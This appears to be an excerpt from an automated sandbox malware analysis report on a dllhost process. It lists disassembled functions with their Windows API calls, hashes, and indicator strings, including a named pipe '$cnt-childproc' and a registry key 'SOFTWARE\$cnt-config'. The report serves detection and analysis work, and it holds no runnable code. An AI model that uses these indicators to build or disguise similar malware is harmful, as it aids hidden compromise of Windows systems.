__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000279A9249689

Part of subcall function 00000279A924A544: __GetUnwindTryBlock.LIBCMT ref: 00000279A924A587
Part of subcall function 00000279A924A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000279A924A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000279A9249761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000279A92499AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000279A9249ABC

Strings

csm, xrefs: 00000279A92496A3
csm, xrefs: 00000279A9249784
csm, xrefs: 00000279A924970A

Memory Dump Source

Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 440ef79c9e781b6a6d6017f60d44ca5a891f842d25007564eb44eb0e01771f9e
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 73D1AF7A60AB808EEB60DF65D4883AD37A0F785BA8F114115EE8D5BB9EDB34C4D0C741

Function 00000279A927A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000279A927A289

Part of subcall function 00000279A927B144: __GetUnwindTryBlock.LIBCMT ref: 00000279A927B187
Part of subcall function 00000279A927B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000279A927B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000279A927A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000279A927A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000279A927A6BC

Strings

csm, xrefs: 00000279A927A2A3
csm, xrefs: 00000279A927A30A
csm, xrefs: 00000279A927A384

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 54e3866d26cd87b9992d3e7cde3df06b779a5ef27fa16b2bd9605348c9374e58
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 0ED18D7260AB808EEB20DF65D4893AD77A0F745BB8F120115EE8D67B9ADB38C5D1C700

Function 00000279A92AA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000279A92AA289

Part of subcall function 00000279A92AB144: __GetUnwindTryBlock.LIBCMT ref: 00000279A92AB187
Part of subcall function 00000279A92AB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000279A92AB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000279A92AA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000279A92AA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000279A92AA6BC

Strings

csm, xrefs: 00000279A92AA30A
csm, xrefs: 00000279A92AA2A3
csm, xrefs: 00000279A92AA384

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 3ebdfee7452cd44503c88e6d8cb8bec0587e98a30b222dcf9940f9fe874f15c0
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 2BD17C7360AB808EEB20DB65D4493AD77A1FB59BA8F120115EE8D57F9ADB34C4D1CB00

Function 00000279A927104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000279A92710B1
RegEnumValueW.ADVAPI32 ref: 00000279A9271117
GetProcessHeap.KERNEL32 ref: 00000279A927115A
HeapAlloc.KERNEL32 ref: 00000279A9271168
GetProcessHeap.KERNEL32 ref: 00000279A9271185
HeapFree.KERNEL32 ref: 00000279A9271193

Strings

d, xrefs: 00000279A92710D6

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 387bc85b5ca216f13d58e1bf65820a579ba48c08a494dcc68326150f265b8b6d
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 67414033219B84DAE760CF21E45879A77A1F788B98F458125DE891B758EF38C585CB40

Function 00000279A92A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000279A92A10B1
RegEnumValueW.ADVAPI32 ref: 00000279A92A1117
GetProcessHeap.KERNEL32 ref: 00000279A92A115A
HeapAlloc.KERNEL32 ref: 00000279A92A1168
GetProcessHeap.KERNEL32 ref: 00000279A92A1185
HeapFree.KERNEL32 ref: 00000279A92A1193

Strings

d, xrefs: 00000279A92A10D6

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: edb0de2afce471b558a308e6ca3fb29cd09a8db1c3e6987b9eedb4af46e745d1
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 45414073219B84DAE760CF21E44879A77A1F388BA8F458125DF8A0BB58DF38D585CB40

Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400010B1
RegEnumValueW.ADVAPI32 ref: 0000000140001117
GetProcessHeap.KERNEL32 ref: 000000014000115A
HeapAlloc.KERNEL32 ref: 0000000140001168
GetProcessHeap.KERNEL32 ref: 0000000140001185
HeapFree.KERNEL32 ref: 0000000140001193

Strings

d, xrefs: 00000001400010D6

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Function 00000279A9272518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000279A927252D
GetCurrentProcessId.KERNEL32 ref: 00000279A9272537
CreateFileW.KERNEL32 ref: 00000279A9272568
WriteFile.KERNEL32 ref: 00000279A9272590
ReadFile.KERNEL32 ref: 00000279A92725AF
CloseHandle.KERNEL32 ref: 00000279A92725B8

Strings

\\.\pipe\$cnt-childproc, xrefs: 00000279A9272549

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$cnt-childproc
API String ID: 166002920-175842701
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: ea575c8df7d3e6fde5231c6bd111b44ff49953dde4153534a1f3a471e4cf547e
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 9211493662AB4086E7108F21F45875A7760F389BE4F944315EE9D02AA8DF3CC188CB40

Function 00000279A92A2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000279A92A252D
GetCurrentProcessId.KERNEL32 ref: 00000279A92A2537
CreateFileW.KERNEL32 ref: 00000279A92A2568
WriteFile.KERNEL32 ref: 00000279A92A2590
ReadFile.KERNEL32 ref: 00000279A92A25AF
CloseHandle.KERNEL32 ref: 00000279A92A25B8

Strings

\\.\pipe\$cnt-childproc, xrefs: 00000279A92A2549

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$cnt-childproc
API String ID: 166002920-175842701
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 15bc923da9022801c6c094e546059effed9522ccbff9235d07e7d23f672bfad2
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 5711493661AB4086E7108B21F45C75A77A0F389BE4F944315EE9E06AA8DF3CC188CB40

Function 00000279A9247050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000279A9247078
__scrt_acquire_startup_lock.LIBCMT ref: 00000279A92470CA
_RTC_Initialize.LIBCMT ref: 00000279A92470F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000279A924711E
__scrt_release_startup_lock.LIBCMT ref: 00000279A9247149

Memory Dump Source

Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 699074b22535e9c000d37ce6afaa4d5dad913a5ac1e0a76b6fb9b997b329967f
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 5581E02060F3414EFB54AB2A984D3996699BBC6BB0F474025AE2D4B7DEDA38C9C5C740

Function 00000279A9277C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000279A9277C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000279A9277CCA
_RTC_Initialize.LIBCMT ref: 00000279A9277CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000279A9277D1E
__scrt_release_startup_lock.LIBCMT ref: 00000279A9277D49

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 4980207233a2cd6c0dd7f65a3f94bf2c1fbfaad38b626d0103e03e756a493b07
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 0681243070F7408FFB50AB65A49D3A962D4BB85BB4F478025AE0D6B396DB38C8C5C300

Function 00000279A92A7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000279A92A7C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000279A92A7CCA
_RTC_Initialize.LIBCMT ref: 00000279A92A7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000279A92A7D1E
__scrt_release_startup_lock.LIBCMT ref: 00000279A92A7D49

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: e381b705765ea25d245bbb390176b92e83a418391d3dc14817f7e75e515d071d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 6581E333F0F7408EFB54AB65944D3A966E5BB857B0F464025AE0D8BF96DB38C9C58304

Function 00000279A9279AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279B31
GetLastError.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279B3F
LoadLibraryExW.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279B69
FreeLibrary.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279BD7
GetProcAddress.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279BE3

Strings

api-ms-, xrefs: 00000279A9279B51

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 3c1a32542c1f91467cac97c9a9bf56b6cc3c95d150475e34e6e01ec10a63a4e9
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 7D318E2525BB409DEF11DB16A808BA523D4FB49BB0F5B5625ED1D5B790EF38C4888350

Function 00000279A92A9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9B31
GetLastError.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9B3F
LoadLibraryExW.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9B69
FreeLibrary.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9BD7
GetProcAddress.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9BE3

Strings

api-ms-, xrefs: 00000279A92A9B51

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 5674dd7ee4184b68ca04dbdaae9cbdf12e4605e2f0c21c73e7d1817bf7d991a2
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 4731802625B7409DEF52DB17A8087A523D4BB49BB0F5B0A25ED1E4BB90EF38C4848310

Function 00000279A9283400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000279A9283431
GetLastError.KERNEL32 ref: 00000279A928343D
CloseHandle.KERNEL32 ref: 00000279A9283455
CreateFileW.KERNEL32 ref: 00000279A9283480
WriteConsoleW.KERNEL32 ref: 00000279A928349F

Strings

CONOUT$, xrefs: 00000279A9283461

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: f259d5baaf8dc0b65041d692ab1f7a34f0b4e8b9fcaad5e653710a183e7a434e
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 39118235329B408AE7608F96F85871977A0F788FF4F558214EE5E87B94CF38C8948744

Function 00000279A92B3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000279A92B3431
GetLastError.KERNEL32 ref: 00000279A92B343D
CloseHandle.KERNEL32 ref: 00000279A92B3455
CreateFileW.KERNEL32 ref: 00000279A92B3480
WriteConsoleW.KERNEL32 ref: 00000279A92B349F

Strings

CONOUT$, xrefs: 00000279A92B3461

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 9e23871bb33162a7f5484f0e6a4f6c7c5e9a7acf06a103b548eeb8875227b70d
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 0911603531AB408AE7618B56E85C71966F4F788BF4F454214EE5E8BB94CF78C4848740

Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400017DC
RegDeleteKeyW.ADVAPI32 ref: 00000001400017ED
RegEnumKeyExW.ADVAPI32 ref: 000000014000182A
RegCloseKey.ADVAPI32 ref: 000000014000183B
RegDeleteKeyExW.ADVAPI32 ref: 0000000140001858

Strings

SOFTWARE\$cnt-config, xrefs: 00000001400017CE, 0000000140001844

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\$cnt-config
API String ID: 3013565938-2485209673
Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Function 00000279A9276270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000279A92762AB
GetThreadContext.KERNEL32 ref: 00000279A9276415

